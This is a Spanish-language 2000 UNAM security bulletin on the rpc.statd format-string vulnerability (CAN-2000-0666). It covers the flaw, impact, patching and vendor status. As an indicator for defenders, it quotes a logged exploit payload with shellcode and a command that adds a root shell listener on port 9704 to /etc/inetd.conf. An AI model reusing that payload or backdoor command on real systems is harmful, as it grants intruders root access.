Boletin Seguridad 2000-009

Area de Seguridad en Computo asc en conga.super.unam.mx
Dom Ago 27 17:59:49 CDT 2000


-----BEGIN PGP SIGNED MESSAGE-----


. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
                   'Area de Seguridad en C'omputo
 
                           DGSCA- UNAM
 
                   Bolet'in de Seguridad 2000-009
 
           Problemas en la Validaci'on del programa rpc.statd
 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 


Fecha de Liberaci'on : 18 de Agosto del 2000
Ultima Revisi'on :     26 de Agosto del 2000
Fuente:                CERT/CC y diversos reportes de Equipos de Respuesta
		       a Incidentes


, , , , , , , , , , , , 
* Sistemas Afectados  *
, , , , , , , , , , , , 

 
Todos los sistemas que se encuentren ejecutando el programa rpc.statd


, , , , , , , , , , , , , , , 
* Descripci'on del Problema *
, , , , , , , , , , , , , , , 

 
En los 'ultimos d'ias se ha manejado en diversas listas de discusi'on y en
reportes de equipos de respuesta a incidentes, reportes de una
vulnerbilidad en la validaci'on de entrada del programa rpc.statd y que
dicha vulnerabilidad est'a siendo usada para obtener acceso a los sistemas
de c'omputo. Este programa llamado rpc.statd se instala por default en la
mayor'a de las distribuciones del sistema operativo Linux. Recomendamos
consultar el Apendice A de este documento el cual contiene informaci'on
especif'ica para el sistema operativo que usted maneje y otras
distribuciones.

Para consultar mayores informes acerca de esta vulnerabilidad recomendamos
consultar los siguientes URL's:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666 
http://www.securityfocus.com/bid/1480 


I. Descripci'on T'ecnica.

El programa rpc.statd proporciona los datos proporcionados por el usuario
a la funci'on syslog() como una cadena. Si no existe una entrada de
validaci'on de dicha cadena, un usuario (intruso malicioso) puede insertar
codigo para que 'este se ejecute con privilegios del proceso rpc.statd,
usualmente estos privilegios le pertenecen al usuarios root.

2. Actividad de los Intrusos.

El siguiente mensaje es un ejemplo de la actividad de los intrusos
explotando la vulnerabilidad rpc.statd y que se registra t'ipicamente
dentro de /var/log/messages al momento que se ejecuta y se explota la
vulnerabilidad

Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname 
containing '/': ^D^D^E^E^F^F^G^G08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v
<83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp 
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

Si dentro de su sistema en el archivo /var/log/messages  'o
/var/adm/messages, aparecen mensajes similares al anterior, le
recomendamos examinar a la brevedad  su sistema buscando alg'un indicio o
patron a segurir de que su sistema ha sido comprometido.

Le recomendamos si no sabe como llevarlo a cabo leer el tutorial de
Detecci'on de Intrusos en las P'aginas del 'Area de Seguridad en C'omputo
de la UNAM.

http://www.asc.unam.mx
http://www.seguridad.unam.mx


, , , , , , 
*  Impacto *
, , , , , , 

Al explotar esta vulnerabilidad, los usuarios  locales del sistema o
remotos podr'an ejecutar diversos programas y c'odigo dentro del sistema
con privilegios del proceso rpc.statd, usualmente con privilegios de
Superusuario (root).


, , , , , , ,
*  Soluci'on *
, , , , , , ,

Ante esta vulnerabilidad el 'Area de Seguridad en C'omputo de la UNAM,
recomienda llevar a cabo las siguientes acciones.

	a) Actualizar la versi'on de rpc.statd

	Recomendamos consultar el ap'endice A de este bolet'in acerca de
la disponibilidad de actualizaci'on de este programa para su sistema en
especif'ico. Si Esta ejecutando una versi'on vulnerable del programa
rpc.statd le recomendamos estar pendiente de las actualizaciones de dicho
programa y le recomendamos ampliamente Actualizar la versi'on 'o en su
defecto aplicar los parches correspondientes del sistema. Una vez
instalados los parches del sistema reinicie el servicio rpc.statd.

	b) Desactivar el servicio rpc.statd

	Si la actualizaci'on del sistema no es posible llevarla a cabo,
recomendamos desactivar el servicio rpc.statd. Recomendamos llevar a cabo
estos pasos con precauci'on, ya que al desactivar este servicio puede
interferir con el uso y funcionamiento del servicio NFS.

	c) Desactivar los puertos necesarios en su Firewall

	Como una buena pr'actica de seguridad se recomienda desactivar los
puertos no necesarios dentro de su firewall. Esta opci'on no soluiona el
problema anteriormente senalado, pero puede prevenir  de los usuarios
externos. En particular el bloquear el puerto 111 que corresponde al
portmapper, puede ser una opci'on pero en algunos otros sistemas puede
variar.


- -----------------------------------------------
 APENDICE A : Informacion adicional
- -----------------------------------------------


A continuaci'on listamos los principales sistemas operativos en los cuales
se ha analizado si presentan fallas en la vulnerabilidad descrita
anteriormente.

	* Berkeley Software Design, Inc. (BSDI)	
	Ninguna versi'on del sistema BSD/OS es vulnerable.
 
	* Caldera, Inc.
	No vulnerable

	* Compaq
	No vulnerable.

	* Debian
	Consulte : http://www.debian.org/security/2000/20000719a 

	* FreeBSD
	FreeBSD no es vulnerable.

	* Hewlett-Packard Company
	No vulnerable.

	* NetBSD
	Las versiones 1.4.x y 1.5 no presentan vulnerabilidad alguna.

	* OpenBSD
	No vulnerable

	* RedHat
	Para una informaci'on mas detallada de este problema que SI afecta
los RED HAT, consultar 

	http://www.redhat.com/support/errata/RHSA-2000-043-03.html 

	* Santa Cruz Operation
	No vulnerable

	* Silicon Graphics, Inc.
	No vulnerable

	* Sun Microsystems, Inc.
	No vulnerable


 , , , , , , ,
 * INFORMACION *
 , , , , , , ,

 Para Mayor Informaci'on o Detalles de este bolet'in contactar a:

                 'Area de Seguridad en C'omputo
                 DGSCA- UNAM
                 Tel : 56 22 81 69
                 Fax : 56 22 80 43
                 E-Mail : asc en asc.unam.mx
                 http://www.asc.unam.mx
                 ftp://ftp.asc.unam.mx


- ---
Juan Carlos Guel L'opez
Area de Seguridad en C'omputo   E-mail: asc en asc.unam.mx
DGSCA, UNAM                     Tel.: 5622-81-69  Fax: 5622-80-43
Circuito Exterior, C. U.        WWW: http://www.asc.unam.mx/
04510 Mexico D. F.              PGP: finger asc en ds5000.super.unam.mx 


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1i

iQEVAwUBOamdhj6HeEeO/+C1AQEvawf/cbEletrW840MMhuyS4YQqY1QmlMYpTji
55Xdpg9/TAVzc+mrlPHXrjDxWT2Ouxlwqe9qsgIgxsrheVxkpPp6rCXBJFS4KEz+
Idj18mbOymRQGyfBQKAf2PDA34LBz1qeG1/VRZA26mZvjrKpprzqw73tcvYn3GcG
n5MWqIgfUgjkBvv0TpWmiZouc5yFf4qoeP7w3jtiaW4MuS9vvMiEHQesTzjqTUtp
Dk+kY+/ZGr+tX1HSf7XgJJdgbYFosOGGQCJjDrscVsZVYy8edfn7/gJObwKkMmeU
kC5vviz3ilXn8vOlErbq8crDSq32WEb8qj7M6Fwerrm9qGUfBCuRew==
=0Q4L
-----END PGP SIGNATURE-----


---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx



Más información sobre la lista de distribución Ayuda